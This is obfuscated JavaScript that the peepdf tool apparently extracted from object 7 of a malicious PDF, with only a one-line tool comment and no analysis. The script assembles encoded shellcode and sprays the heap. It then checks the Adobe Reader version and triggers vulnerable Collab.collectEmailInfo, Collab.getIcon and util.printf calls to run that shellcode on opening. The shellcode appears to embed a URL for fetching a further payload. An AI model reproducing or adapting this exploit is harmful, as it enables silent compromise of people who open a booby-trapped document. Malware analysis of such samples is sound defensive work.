// peepdf comment: Javascript code located in object 7 (version 0)

var xyutequex = false;
var wochechuc = new Array();

function hethithyq() {}
function wexyixyat() {}
var thexye;

function cazethexy(cazethexy) {
    return true;
}
this.pecuwo = 24560;

function kazuq(mochyb, fabaquochu) {
    function thith(thith) {
        return thith;
    }
    while (mochyb.length * 2 < fabaquochu) mochyb += mochyb;
    this.quynopaque = 'quynopaque';
    mochyb = mochyb.substring(0, fabaquochu / 2);

    function natoj(natoj) {
        return natoj;
    }
    return mochyb;
}
this.laxyeth = false;

function tychux(gabuz) {
    var nithochyp = false;
    var xyicedax = 0x0c0c0c0c;
    var queth = false;
    var cotuchuvuq = false;
    var xyymichan = new Array('%u4343%', 'u4343%u', '4343%u0', 'FEB%u33', '5B%u66C9', '%u80B9', '%u800', '1%uEF3', '3%uE2', '43%uEBFA', '%uE805%', 'uFFEC%u', 'FFFF%', 'u8B7F', '%uDF4', 'E%uEFEF', '%u64EF%', 'uE3AF%u', '9F64%u42', 'F3%u9F6', '4%u6EE7', '%uEF03', '%uEFEB', '%u64E', 'F%uB9', '03%u6187', '%uE1A1%u', '0703%uEF', '11%uEF', 'EF%uAA', '66%uB9EB', '%u778', '7%u65', '11%u0', '7E1%uE', 'F1F%uE', 'FEF%u', 'AA66%uB', '9E7%uCA', '87%u105F', '%u072D%u', 'EF0D%', 'uEFEF%u', 'AA66%uB9', 'E3%u00', '87%u0F', '21%u078F', '%uEF3B%u', 'EFEF%', 'uAA66%', 'uB9FF', '%u2E8', '7%u0A9', '6%u0757%', 'uEF29%uE', 'FEF%uA', 'A66%uA', 'FFB%uD76', 'F%u9A2', 'C%u66', '15%uF', '7AA%uE8', '06%uE', 'FEE%uB', '1EF%u', '9A66%', 'u64CB%', 'uEBAA%u', 'EE85%u6', '4B6%uF', '7BA%u0', '7B9%uE', 'F64%u', 'EFEF%u8', '7BF%u', 'F5D9%', 'u9FC0%u7', '807%u', 'EFEF%u66', 'EF%uF', '3AA%u2A', '64%u2', 'F6C%u6', '6BF%uCFA', 'A%u1087%', 'uEFEF%', 'uBFEF%', 'uAA64%u', '85FB%', 'uB6ED%uB', 'A64%u07F', '7%uEF8E', '%uEFEF%u', 'AAEC%u', '28CF%', 'uB3EF%', 'uC191', '%u288A%', 'uEBAF', '%u8A97%u', 'EFEF%u', '9A10%u64', 'CF%uE3AA', '%uEE8', '5%u64B6', '%uF7B', 'A%uAF07', '%uEFEF%u', '85EF%', 'uB7E8%uA', 'AEC%u', 'DCCB%uBC', '34%u10BC', '%uCF9A%u', 'BCBF%u', 'AA64%', 'u85F3%', 'uB6EA', '%uBA64%u', '07F7%uE', 'FCC%uEF', 'EF%uEF', '85%u9', 'A10%u64C', 'F%uE7', 'AA%uE', 'D85%u', '64B6%', 'uF7BA', '%uFF07%', 'uEFEF', '%u85EF', '%u6410', '%uFFAA', '%uEE85%', 'u64B6', '%uF7BA%u', 'EF07%uE', 'FEF%uAE', 'EF%uBDB4', '%u0EEC%u', '0EEC%u', '0EEC%u0E', 'EC%u03', '6C%uB5', 'EB%u64', 'BC%u0D', '35%uBD', '18%u0', 'F10%u', '64BA%u6', '403%uE79', '2%uB264', '%uB9E3', '%u9C64%u', '64D3%u', 'F19B%', 'uEC97%uB', '91C%u99', '64%uEC', 'CF%uDC1C', '%uA626%u', '42AE%u2C', 'EC%uDC', 'B9%uE', '019%uFF5', '1%u1D', 'D5%uE79B', '%u212E%', 'uECE2%', 'uAF1D%', 'u1E04', '%u11D4%', 'u9AB1', '%uB50A', '%u046', '4%uB564', '%uECCB%u', '8932%uE3', '64%u64A', '4%uF3B5', '%u32EC%u', 'EB64%u', 'EC64%uB1', '2A%u2D', 'B2%uEFE7', '%u1B07%', 'u1011%uB', 'A10%uA', '3BD%uA0A', '2%uEFA1%', 'u7468%', 'u7074%u', '2F3A%u', '6D2F%u6', '46F%u6', 'F6C%u6', '461%u6', '465%u63', '2E%u6D6', 'F%u662F', '%u616C%u', '6873%u6', '52F%u65', '78%u702E', '%u7068%', 'u783F%', 'u703D%', 'u6664', '');

    function kychojop(kychojop) {
        return true;
    }
    xyythoch = xyymichan.join("");
    var quachytho = 9814;
    var thicho = 'thicho';
    var quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);

    function cytichich(cytichich) {
        return cytichich;
    }
    var xyewud = 13398;
    if (gabuz == 1) {
        this.choxye = false;
        xyicedax = 0x30303030;

        function pedip(pedip) {
            return true;
        }
        quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);
        this.chevyfemaq = "chevyfemaq";
    } else if (gabuz == 2) {
        var xyajy = 'xyajy';
        quafynuquo = eval("une" + "sca" + "pe" + "")(xyythoch);

        function xyisupody(xyisupody) {
            return true;
        }
    }
    var cyquelejaq = false;

    function thochy() {}
    this.jogixyu = 1171;
    var quovequiva = 0x400000;
    var parethece = false;
    var rycofychum = quafynuquo.length * 2;
    this.xyycha = false;
    var fabaquochu = quovequiva - (rycofychum + 0x38);
    this.fucaquich = 'fucaquich';
    var mochyb = eval("une" + "sca" + "pe" + "")("%u909" + "0%u90" + "90" + "");

    function wecaxya(wecaxya) {
        return true;
    }
    mochyb = kazuq(mochyb, fabaquochu);

    function chequoc() {}
    var bijuja = (xyicedax - 0x400000) / quovequiva;
    this.thyque = 'thyque';
    for (var zeduxy = 0; zeduxy < bijuja; zeduxy++) wochechuc[zeduxy] = mochyb + quafynuquo;

    function quesuz(quesuz) {
        return true;
    }
}
function xyejywed() {
    var xyixyuquac = 'xyixyuquac';
    var micachy = 0;
    this.chuthoc = "chuthoc";
    var kaxyucochi = app.viewerVersion.toString();

    function quothete(quothete) {
        return true;
    }
    app.clearTimeOut(thexye);
    this.chahach = "chahach";
    if ((kaxyucochi >= 8 && kaxyucochi < 8.102) || kaxyucochi < 7.1) {
        this.quakaxyi = false;
        tychux(0);

        function xyuchonyq(xyuchonyq) {
            return true;
        }
        var requochos = unescape("%u" + "0c" + "0c" + "%u" + "0c" + "0c" + "");
        var xyimy = 21631;
        while (requochos.length < 0xaf98) requochos += requochos;
        var xyeth = false;
        eval("this")["co" + "ll" + "ab" + "St" + "or" + "e" + ""] = eval("Col" + "lab" + "")["co" + "ll" + "ec" + "tE" + "ma" + "il" + "In" + "fo" + ""]({
            subj: "dilyxyyqu",
            msg: requochos
        });
        var jequed = 'jequed';
    }
    if ((kaxyucochi >= 8.102 && kaxyucochi < 8.104) || (kaxyucochi >= 9 && kaxyucochi < 9.1) || kaxyucochi <= 7.101) {
        try {
            if (app["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["get" + "Ico" + "n" + ""]) {
                function dachi(dachi) {
                    return dachi;
                }
                tychux(2);
                this.thexyi = "thexyi";
                var dumizec = eval("un" + "es" + "ca" + "pe" + "")("%09");
                var masyxyuch = 'masyxyuch';
                this.xyychy = 'xyychy';
                while (dumizec.length < 0x4000) dumizec += dumizec;
                this.xyyxyas = 11155;
                dumizec = "N." + dumizec;

                function chiquuchib(chiquuchib) {
                    return true;
                }
                eval("ap" + "p" + "")["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["ge" + "tI" + "co" + "n" + ""](dumizec);
                var thada = 'thada';
                micachy = 1;

                function xyuchocho(xyuchocho) {
                    return true;
                }
            } else micachy = 1;
        } catch (e) {
            micachy = 1;
        }
        if (micachy == 1) {
            if (kaxyucochi == 8.102 || kaxyucochi == 7.1) {
                tychux(1);
                this.dykexy = 15280;
                var tyxyecechi = 12954;
                eval("ut" + "il" + "")["pri" + "ntf" + ""]("%4" + "50" + "00" + "f" + "", "1299999999999999" + "9999888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "88888888" + "");
            }
        }
    }
}
app.chiny = xyejywed;

function noquifyqu(noquifyqu) {
    return noquifyqu;
}
thexye = app.setTimeOut("app.chiny()", 10);

